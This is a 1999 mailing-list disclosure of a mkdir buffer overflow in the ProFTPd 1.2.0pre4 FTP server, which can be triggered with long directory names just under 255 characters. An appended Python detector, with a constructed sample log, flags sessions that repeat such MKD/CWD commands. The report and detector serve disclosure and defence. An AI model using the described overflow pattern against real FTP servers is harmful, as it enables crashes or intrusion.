Renaud Deraison
1999-Sep-04 17:08 UTC
buffer overflow in proftpd-1.2.0pre4, supposed to be 'safe'
Hello,

ProFTPd, an FTP server, has been suffering several security holes lately. However, version 1.2.0pre4 is still vulnerable to a mkdir attack, even though it is supposed to be patched against it.

The trick is to create directories whose names don't exceed 255 chars.

I have not looked at this problem in detail, but I could at least make a pointer point to a bogus location (85858585) using this method.

Attached to this mail is a C program that will make proftpd crash, but which won't exploit the vulnerability.

Thank you for your attention,

-- Renaud

--
Renaud Deraison
The Nessus Project
http://www.nessus.org

[Attachment: crash_ftpd.c (demo code, sent base64-encoded)]
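A defender reading this report would want a quick way to spot the pattern it describes in FTP command logs: directory operations whose arguments stay under the 255-char cap yet are far longer than any legitimate name. The following detector is an added example, not part of Renaud's post or of ProFTPd; it assumes a constructed one-command-per-line log format (`timestamp sess=N CMD arg`), not real ProFTPD output, and a threshold of 200 chars repeated at least twice per session.

```python
import re
from collections import defaultdict

# Constructed sample log (assumed format, not real ProFTPD output). Session 1 issues
# repeated MKD/CWD commands with 254-char names, each below the 255-char limit the
# post says 1.2.0pre4 checks against; session 2 is ordinary traffic.
SAMPLE_LOG = """\
1999-09-04T17:08:01 sess=1 USER ftp
1999-09-04T17:08:01 sess=1 PASS ****
1999-09-04T17:08:02 sess=1 CWD /incoming
1999-09-04T17:08:02 sess=1 MKD {long}
1999-09-04T17:08:02 sess=1 CWD {long}
1999-09-04T17:08:03 sess=1 MKD {long}
1999-09-04T17:08:03 sess=1 CWD {long}
1999-09-04T17:08:05 sess=2 CWD /pub
1999-09-04T17:08:05 sess=2 MKD reports
""".replace("{long}", "X" * 254)

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sess=(?P<sess>\d+) (?P<cmd>[A-Z]{3,4})(?: (?P<arg>.*))?$"
)

# Commands that take a directory name; XMKD/XCWD are the RFC 775 spellings.
DIR_COMMANDS = {"MKD", "XMKD", "CWD", "XCWD"}


def parse(line):
    """Split one log line into ts/sess/cmd/arg, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious_sessions(log_text, arg_len=200, min_hits=2):
    """Return {session: [(cmd, arg_length), ...]} for sessions that issued at least
    min_hits directory commands whose argument is arg_len chars or longer.
    A per-command cap of 255 alone would pass every one of these, which is the
    point of the report, so the heuristic keys on length and repetition together."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None or rec["cmd"] not in DIR_COMMANDS:
            continue
        arg = rec["arg"] or ""
        if len(arg) >= arg_len:
            hits[rec["sess"]].append((rec["cmd"], len(arg)))
    return {sess: h for sess, h in hits.items() if len(h) >= min_hits}


if __name__ == "__main__":
    for sess, cmds in find_suspicious_sessions(SAMPLE_LOG).items():
        print(f"session {sess}: {len(cmds)} long directory commands {cmds}")
```

Tune `arg_len` to the longest directory name your users legitimately create; the repetition count is what separates one odd name from a sequence of them.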